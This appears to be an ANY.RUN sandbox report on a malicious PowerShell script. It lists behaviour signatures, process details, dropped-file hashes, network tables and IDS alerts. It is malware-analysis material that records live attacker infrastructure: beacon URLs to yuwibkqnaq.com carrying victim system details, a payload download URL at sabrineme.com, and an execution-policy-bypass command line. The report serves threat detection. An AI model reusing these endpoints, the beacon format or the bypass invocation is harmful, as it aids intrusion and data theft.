File name:

_4b98604bc283291e7573925c9f5656b2713c7840b6d0daa8cec029b25c04af4c.txt

Full analysis: https://app.any.run/tasks/0ea2d35b-d054-421e-a161-3d89fa10a58d
Verdict: Malicious activity
Analysis date: March 13, 2026, 07:08:23
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
evasion
anti-evasion
susp-powershell
Indicators:
MIME: text/plain
File info: ASCII text
MD5:

11EB0617AB7A4F01D4FCEF5158F906BE

SHA1:

50D0F02B5721BEABFF33F50E7CBB76F6B32B0383

SHA256:

6415263F159D27D7D8873F1C62BC31518D9C1E33CE40EC809CAE8F3DA05633F1

SSDEEP:

3:uKNnKTfBzfN7QVQn:Fbun

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Enumerates installed antivirus status via Win32_AntivirusProduct (SCRIPT)

      • powershell.exe (PID: 8196)

    • Enumerates physical memory (Win32_PhysicalMemory) (SCRIPT)

      • powershell.exe (PID: 8196)

    • Get Video Controller Information (POWERSHELL)

      • powershell.exe (PID: 8196)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 8196)

  • SUSPICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 8196)

    • The process executes Powershell scripts

      • powershell.exe (PID: 8196)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 8196)

    • Converts a string into array of characters (POWERSHELL)

      • powershell.exe (PID: 8196)

    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 8196)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 8196)

    • Checks for external IP

      • svchost.exe (PID: 2292)
      • powershell.exe (PID: 8196)

    • Checks a user's role membership (POWERSHELL)

      • powershell.exe (PID: 8196)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 8196)

  • INFO

    • Disables trace logs

      • powershell.exe (PID: 8196)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 8196)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 8196)

    • Using PowerShell for ZIP File Operations

      • powershell.exe (PID: 8196)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 8196)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 8196)

    • User-Agent configuration (POWERSHELL)

      • powershell.exe (PID: 8196)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
141
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe conhost.exe no specs svchost.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
2292C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
7164\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7664C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
8196"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Desktop\_4b98604bc283291e7573925c9f5656b2713c7840b6d0daa8cec029b25c04af4c.txt.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
Total events
9 532
Read events
9 532
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
5
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
8196powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:DD8013AA1E017551C8297C938D749457
SHA256:4ECAC03724F63694C909648584073004EC3FC00F1B5C920EA73273C0F9D42FA2
8196powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L7JCUSHT66HI1SKLHLXX.tempbinary
MD5:DD8013AA1E017551C8297C938D749457
SHA256:4ECAC03724F63694C909648584073004EC3FC00F1B5C920EA73273C0F9D42FA2
8196powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mgfag22e.laq.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8196powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF1e6e48.TMPbinary
MD5:00A03B286E6E0EBFF8D9C492365D5EC2
SHA256:4DBFC417D053BA6867308671F1C61F4DCAFC61F058D4044DB532DA6D3BDE3615
8196powershell.exeC:\Users\admin\AppData\Local\Temp\pvdb_jrkfap_m_ptzou_a.zip.tmphtml
MD5:BFA8E3F29ECE88EC95198F8E9C7D0302
SHA256:F50BC5724E4668070D4B2D3B81A793483D4325D03C079C0080CFB9943EA80E01
8196powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0ty0myqf.bqr.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8196powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:FD41E4F2B277D3E401D1D375C92A1DE1
SHA256:B69D61C3F15DE3FA71393FF4D1E427E82B909A0AE6519006AF0AD0580CF97EF4
8196powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_erpecnja.mik.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8196powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_g2oi1kzk.tce.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8196powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:7A18FE12596711D455CBBC37C25F39A7
SHA256:FDDD8958E4F4E09E77E3B1B5F9C87027C6C5409A44BA129931239F71329A19A0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
30
TCP/UDP connections
30
DNS requests
15
Threats
24

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
8196
powershell.exe
GET
200
34.160.111.145:443
https://ifconfig.me/ip
US
binary
12 b
unknown
GET
200
104.16.124.96:443
https://www.cloudflare.com/cdn-cgi/trace
US
278 b
GET
200
185.80.91.86:443
https://yuwibkqnaq.com/4Hxlb5hKzp0S9QL9-2RNPa4cFwLJa2c05DqVgeYo5aQ?id=01c32648-afb7-48ef-995f-23a471008f35&s=check_system_ok&user=admin&pc=DESKTOP-JGLLJLD&cwd=C%3A%5CUsers%5Cadmin%5CAppData%5CLocal%5CTemp&osver=Microsoft%20Windows%20NT%2010.0.19045.0&osname=Microsoft%20Windows%2010%20Pro&pcmodel=DELL&pcmanuf=DELL&psv=5.1.19041.4046&admin=False&avinfo=Windows%20Defender&cpu=AMD%20Ryzen%205%203500%206-Core%20Processor&ram=6%20GB&gpu=Microsoft%20Basic%20Display%20Adapter&domain=DESKTOP-JGLLJLD&arch=x64&tz=Eastern%20Standard%20Time&noise=3937
CH
8196
powershell.exe
GET
200
104.16.124.96:443
https://www.cloudflare.com/cdn-cgi/trace
US
text
278 b
unknown
GET
200
116.202.222.249:443
https://sabrineme.com/asfixsoftwaredev.zip
IN
html
1.74 Kb
unknown
6768
MoUsoCoreWorker.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
8196
powershell.exe
GET
200
185.80.91.86:443
https://yuwibkqnaq.com/4Hxlb5hKzp0S9QL9-2RNPa4cFwLJa2c05DqVgeYo5aQ?id=01c32648-afb7-48ef-995f-23a471008f35&s=download_fail&user=admin&pc=DESKTOP-JGLLJLD&cwd=C%3A%5CUsers%5Cadmin%5CAppData%5CLocal%5CTemp&osver=Microsoft%20Windows%20NT%2010.0.19045.0&osname=Microsoft%20Windows%2010%20Pro&pcmodel=DELL&pcmanuf=DELL&psv=5.1.19041.4046&admin=False&avinfo=Windows%20Defender&cpu=AMD%20Ryzen%205%203500%206-Core%20Processor&ram=6%20GB&gpu=Microsoft%20Basic%20Display%20Adapter&domain=DESKTOP-JGLLJLD&arch=x64&tz=Eastern%20Standard%20Time&noise=71688&msg=FileTooSmall
RU
html
1.74 Kb
unknown
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
8196
powershell.exe
GET
200
185.80.91.86:443
https://yuwibkqnaq.com/4Hxlb5hKzp0S9QL9-2RNPa4cFwLJa2c05DqVgeYo5aQ?id=01c32648-afb7-48ef-995f-23a471008f35&s=check_system_ok&user=admin&pc=DESKTOP-JGLLJLD&cwd=C%3A%5CUsers%5Cadmin%5CAppData%5CLocal%5CTemp&osver=Microsoft%20Windows%20NT%2010.0.19045.0&osname=Microsoft%20Windows%2010%20Pro&pcmodel=DELL&pcmanuf=DELL&psv=5.1.19041.4046&admin=False&avinfo=Windows%20Defender&cpu=AMD%20Ryzen%205%203500%206-Core%20Processor&ram=6%20GB&gpu=Microsoft%20Basic%20Display%20Adapter&domain=DESKTOP-JGLLJLD&arch=x64&tz=Eastern%20Standard%20Time&noise=3937
RU
1.74 Kb
unknown
8196
powershell.exe
GET
200
116.202.222.249:443
https://sabrineme.com/asfixsoftwaredev.zip
DE
1.74 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:137
Not routed
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
6768
MoUsoCoreWorker.exe
2.16.164.49:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
2.16.164.49:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
5516
svchost.exe
2.16.164.49:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
6768
MoUsoCoreWorker.exe
23.52.181.212:80
www.microsoft.com
AKAMAI-AS
US
whitelisted
5516
svchost.exe
23.52.181.212:80
www.microsoft.com
AKAMAI-AS
US
whitelisted
23.52.181.212:80
www.microsoft.com
AKAMAI-AS
US
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.104.136.2
whitelisted
google.com
  • 142.251.36.110
whitelisted
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.120
  • 2.19.11.105
  • 2.19.11.120
whitelisted
www.microsoft.com
  • 23.52.181.212
  • 88.221.169.152
whitelisted
api.github.com
  • 140.82.121.5
whitelisted
httpbin.org
  • 35.174.69.157
  • 3.94.136.222
  • 54.85.12.145
  • 50.17.231.182
  • 34.195.100.32
  • 44.199.137.203
  • 34.230.126.118
  • 54.197.177.21
unknown
ifconfig.me
  • 34.160.111.145
whitelisted
www.cloudflare.com
  • 104.16.124.96
  • 104.16.123.96
whitelisted
yuwibkqnaq.com
  • 185.80.91.86
unknown
sabrineme.com
  • 116.202.222.249
malicious

Threats

PID
Process
Class
Message
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
8196
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2292
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Lookup Domain (ifconfig .me)
8196
powershell.exe
Misc activity
ET INFO Observed External IP Lookup Domain (ifconfig .me) in TLS SNI
2292
svchost.exe
Misc activity
ET INFO External IP Lookup Domain (ifconfig .me) in DNS Lookup
8196
powershell.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup SSL/TLS Certificate (ifconfig .me)
8196
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain (ifconfig .me)
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
_4b98604bc283291e7573925c9f5656b2713c7840b6d0daa8cec029b25c04af4c.txt